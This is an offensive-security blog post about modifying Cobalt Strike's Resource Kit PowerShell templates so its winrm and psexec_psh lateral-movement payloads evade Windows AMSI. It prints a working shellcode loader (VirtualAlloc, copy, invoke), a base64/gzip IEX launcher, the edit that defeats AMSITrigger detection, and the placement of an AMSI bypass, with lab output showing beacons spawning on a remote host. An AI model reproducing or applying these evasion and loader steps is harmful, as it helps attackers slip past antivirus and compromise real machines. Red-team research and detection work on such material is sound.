<!doctype html>
<html lang="en-us">
  <head>
    <title>Making AMSI Jump - Offensive Defence</title>
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.108.0">
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="https://offensivedefence.co.uk/css/main.min.f90f5edd436ec7b74ad05479a05705770306911f721193e7845948fb07fe1335.css" />
    <script src="https://kit.fontawesome.com/89e1a73a2b.js" crossorigin="anonymous"></script>

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Making AMSI Jump"/>
<meta name="twitter:description" content="Since 3.13, Cobalt Strike has had a Malleable C2 option called amsi_disable. This directive tells Beacon to patch the AmsiScanBuffer function in the host process prior to injecting post-ex capabilities such as powerpick and execute-assembly. This limits AMSI&rsquo;s visibility of said process and (hopefully) prevents the PowerShell / .NET assemblies being executed from being scanned.
One set of workflows that amsi_disable does not apply to, are the new (as of 4."/>

    <meta property="og:title" content="Making AMSI Jump" />
<meta property="og:description" content="Since 3.13, Cobalt Strike has had a Malleable C2 option called amsi_disable. This directive tells Beacon to patch the AmsiScanBuffer function in the host process prior to injecting post-ex capabilities such as powerpick and execute-assembly. This limits AMSI&rsquo;s visibility of said process and (hopefully) prevents the PowerShell / .NET assemblies being executed from being scanned.
One set of workflows that amsi_disable does not apply to, are the new (as of 4." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://offensivedefence.co.uk/posts/making-amsi-jump/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2020-06-16T10:52:27+01:00" />
<meta property="article:modified_time" content="2020-06-16T10:52:27+01:00" />


  </head>
  <body>
    <header class="app-header">
      <a href="https://offensivedefence.co.uk"><img class="app-header-avatar" src="/avatar.png" alt="John Doe" /></a>
      <h1>Offensive Defence</h1>
      <p>&#34;The hand which strikes also blocks.&#34;</p>

    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">Making AMSI Jump</h1>
      <div class="post-meta">
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-link">
  <path d="M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71"></path>
  <path d="M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71"></path>
</svg>
              <a class="tag" href="https://offensivedefence.co.uk/authors/rastamouse/">Rasta Mouse</a>
        
      
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Jun 16, 2020
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          5 min read
        </div></div>
    </header>
    <div class="post-content">
      <p>Since 3.13, Cobalt Strike has had a Malleable C2 option called <code>amsi_disable</code>.  This directive tells Beacon to patch the <code>AmsiScanBuffer</code> function in the host process prior to injecting post-ex capabilities such as <code>powerpick</code> and <code>execute-assembly</code>.  This limits AMSI&rsquo;s visibility of said process and (hopefully) prevents the PowerShell / .NET assemblies being executed from being scanned.</p>
<p>One set of workflows that <code>amsi_disable</code> does not apply to, are the new (as of 4.0) <code>jump</code> commands.</p>
<pre tabindex="0"><code>beacon&gt; help jump
Use: jump [exploit] [target] [listener]

Attempt to spawn a session on a remote target with the specified exploit.

Type jump by itself to see a list of available remote exploits.

beacon&gt; jump

Beacon Remote Exploits
======================

    Exploit                   Arch  Description
    -------                   ----  -----------
    psexec                    x86   Use a service to run a Service EXE artifact
    psexec64                  x64   Use a service to run a Service EXE artifact
    psexec_psh                x86   Use a service to run a PowerShell one-liner
    winrm                     x86   Run a PowerShell script via WinRM
    winrm64                   x64   Run a PowerShell script via WinRM
</code></pre><p><code>psexec_psh</code>, <code>winrm</code> and <code>winrm64</code> all use PowerShell and will be the subject of this post.</p>
<p>When lateral movement via <code>winrm</code> / <code>winrm64</code> is blocked by AMSI, the output very helpfully lets us know that&rsquo;s what&rsquo;s happening.</p>
<p><img src="/images/making-amsi-jump/winrm64-blocked.png" alt="winrm64-blocked" title="winrm64 blocked"></p>
<p><code>psexec_psh</code> is understandably less helpful.  We see a service has been created and started, but we can&rsquo;t connect to the target.</p>
<p><img src="/images/making-amsi-jump/psexec_psh-blocked.png" alt="psexec_psh-blocked" title="psexec_psh blocked"></p>
<h2 id="resource-kit--amsitrigger">Resource Kit &amp; AMSITrigger</h2>
<p>The default PowerShell templates used to generate these payloads can be overridden using the <a href="https://www.cobaltstrike.com/scripts">Resource Kit</a>.  Within this package, we have <code>resources.cna</code>, <code>template.x86.ps1</code>, <code>template.x64.ps1</code> and <code>compress.ps1</code>.</p>
<p>Within these templates, there are lines such as</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>[Byte[]]$var_code = [System.Convert]::FromBase64String(&#39;%%DATA%%&#39;)
</span></span></code></pre></div><p>where <code>%%DATA%%</code> is simply a placeholder for the actual Beacon payload.</p>
<p>First off, we can use a tool such as <a href="https://github.com/RythmStick/AMSITrigger">AMSITrigger</a> to see if any detections are triggered from the templates themselves.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>D:\Tools\AMSITrigger\AMSITrigger\bin\Debug&gt;AmsiTrigger.exe -i D:\Tools\cobaltstrike\resourcekit\template.x64.ps1 -f 2
</span></span><span style="display:flex;"><span>[23]    &#34;If ([IntPtr]::size -eq 8) {
</span></span><span style="display:flex;"><span>        [Byte[]]$var_code = [System.Convert]::FromBase64String(&#39;%%DATA%%&#39;)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        for ($x = 0; $x -lt $var_code.Count; $x++) {
</span></span><span style="display:flex;"><span>                $var_code[$x] = $var_code[$x] -bxor 35
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        $var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
</span></span><span style="display:flex;"><span>        $var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
</span></span><span style="display:flex;"><span>        [System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        $var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
</span></span><span style="display:flex;"><span>        $var_runme.Invoke([IntPtr]::Zero&#34;
</span></span></code></pre></div><p>The general methodology here is to make modifications to the code being highlighted as malicious and re-scanning with AMSITrigger.  I was able to circumvent by simply adding <code>else { return }</code> to the end of the <code>If ([IntPtr]::size -eq 8)</code> block <code>¯\_(ツ)_/¯</code>.</p>
<p>Now if we load <code>resources.cna</code> into the Cobalt Strike Script Manager, and try <code>jump winrm64</code> again&hellip;</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>beacon&gt; jump winrm64 WIN-CJ8120QPH84 tcp
</span></span><span style="display:flex;"><span>[*] Tasked beacon to run windows/beacon_bind_tcp (0.0.0.0:4444) on WIN-CJ8120QPH84 via WinRM
</span></span><span style="display:flex;"><span>[+] host called home, sent: 219563 bytes
</span></span><span style="display:flex;"><span>[+] established link to child beacon: 192.168.152.128
</span></span></code></pre></div><p>Repeat the same process with <code>template.x86.ps1</code> and we can have <code>jump winrm</code> working as well.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>beacon&gt; jump winrm WIN-CJ8120QPH84 tcp
</span></span><span style="display:flex;"><span>[*] Tasked beacon to run windows/beacon_bind_tcp (0.0.0.0:4444) on WIN-CJ8120QPH84 via WinRM
</span></span><span style="display:flex;"><span>[+] host called home, sent: 195283 bytes
</span></span><span style="display:flex;"><span>[+] established link to child beacon: 192.168.152.128
</span></span></code></pre></div><h2 id="the-compression-problem">The Compression Problem</h2>
<p>Even though <code>psexec_psh</code> also uses <code>template.x86.ps1</code>, it was still failing.  By enabling PowerShell Transcript logging on the test target, I was able to see what was happening.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>Windows PowerShell transcript start
</span></span><span style="display:flex;"><span>Start time: 20200616135045
</span></span><span style="display:flex;"><span>Username: TESTLAB\SYSTEM
</span></span><span style="display:flex;"><span>RunAs User: TESTLAB\SYSTEM
</span></span><span style="display:flex;"><span>Machine: WIN-CJ8120QPH84 (Microsoft Windows NT 10.0.14393.0)
</span></span><span style="display:flex;"><span>Host Application: powershell -nop -w hidden -enc JABz[...snip...]ADsA
</span></span><span style="display:flex;"><span>**********************
</span></span><span style="display:flex;"><span>PS&gt;$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(&#34;H4sI[...snip...]CwAA&#34;));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
</span></span><span style="display:flex;"><span>At line:1 char:1
</span></span><span style="display:flex;"><span>+ $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(&#34;H4sIAAAAA ...
</span></span><span style="display:flex;"><span>+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</span></span><span style="display:flex;"><span>This script contains malicious content and has been blocked by your antivirus software.
</span></span><span style="display:flex;"><span>At line:1 char:1
</span></span><span style="display:flex;"><span>+ $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(&#34;H4sIAAAAA ...
</span></span><span style="display:flex;"><span>+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</span></span><span style="display:flex;"><span>This script contains malicious content and has been blocked by your antivirus
</span></span><span style="display:flex;"><span>software.
</span></span><span style="display:flex;"><span>    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordEx
</span></span><span style="display:flex;"><span>   ception
</span></span><span style="display:flex;"><span>    + FullyQualifiedErrorId : ScriptContainedMaliciousContent
</span></span></code></pre></div><p>It seems that AMSI has a real issue with base64 decoding and decompressing a GZIP compressed binary - regardless of the actual binary itself.  We can verify this by using <code>cmd.exe</code> as a test candidate.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>PS &gt; $cmdBytes = [System.IO.File]::ReadAllBytes(&#34;C:\Windows\System32\cmd.exe&#34;)
</span></span><span style="display:flex;"><span>PS &gt; [System.IO.MemoryStream] $ms = New-Object System.IO.MemoryStream
</span></span><span style="display:flex;"><span>PS &gt; $gs = New-Object System.IO.Compression.GzipStream $ms, ([IO.Compression.CompressionMode]::Compress)
</span></span><span style="display:flex;"><span>PS &gt; $gs.Write($cmdBytes, 0, $cmdBytes.Length)
</span></span><span style="display:flex;"><span>PS &gt; $gs.Close(); $ms.Close()
</span></span><span style="display:flex;"><span>PS &gt; [System.Convert]::ToBase64String($ms.ToArray()) | clip
</span></span></code></pre></div><p>Now if we try to decode and decompress&hellip;</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>PS C:\Users\Daniel&gt; $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(&#34;H4sI[...snip...]AA==&#34;));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>At line:1 char:1
</span></span><span style="display:flex;"><span>+ $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(&#34;H4sIAAAAA ...
</span></span><span style="display:flex;"><span>+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</span></span><span style="display:flex;"><span>This script contains malicious content and has been blocked by your antivirus software.
</span></span><span style="display:flex;"><span>    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
</span></span><span style="display:flex;"><span>    + FullyQualifiedErrorId : ScriptContainedMaliciousContent
</span></span></code></pre></div><p>My first thoughts for trying to get around this was to modify <code>compress.ps1</code> and transform the data in a different way or find a different compression method.  Whilst experimenting, I actually made syntactic error near the top of the script and saw PowerShell errors being spat out in the transcript log, prior to the actual AMSI error being thrown.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>**********************
</span></span><span style="display:flex;"><span>PS&gt;CommandInvocation(Out-String): &#34;Out-String&#34;
</span></span><span style="display:flex;"><span>&gt;&gt; ParameterBinding(Out-String): name=&#34;InputObject&#34;; value=&#34;The term &#39;some-garbage&#39; is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.&#34;
</span></span><span style="display:flex;"><span>some-garbage : The term &#39;some-garbage&#39; is not recognized as the name of a cmdlet, function, script file, or operable 
</span></span><span style="display:flex;"><span>program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
</span></span><span style="display:flex;"><span>At line:1 char:1
</span></span><span style="display:flex;"><span>+ some-garbage;
</span></span></code></pre></div><p>This showed that I have code execution prior to the Beacon payload being decoded, so I placed a custom version of my <a href="https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/master/ASBBypass.ps1">old AMSI bypass</a> at the very top of <code>compress.ps1</code> which seemed to do the trick.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>beacon&gt; jump psexec_psh WIN-CJ8120QPH84 tcp
</span></span><span style="display:flex;"><span>[*] Tasked beacon to run windows/beacon_bind_tcp (0.0.0.0:4444) on WIN-CJ8120QPH84 via Service Control Manager (PSH)
</span></span><span style="display:flex;"><span>[+] host called home, sent: 210319 bytes
</span></span><span style="display:flex;"><span>[+] received output:
</span></span><span style="display:flex;"><span>Started service f718f3b on WIN-CJ8120QPH84
</span></span><span style="display:flex;"><span>[+] established link to child beacon: 192.168.152.128
</span></span></code></pre></div><h2 id="conclusion">Conclusion</h2>
<p>The flexibility provided by the Resource Kit allows you to transform Cobalt Strike&rsquo;s artifacts in practically anyway you may choose and it just goes to show how little effort you sometimes have to put in to achieve quite decent results.</p>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
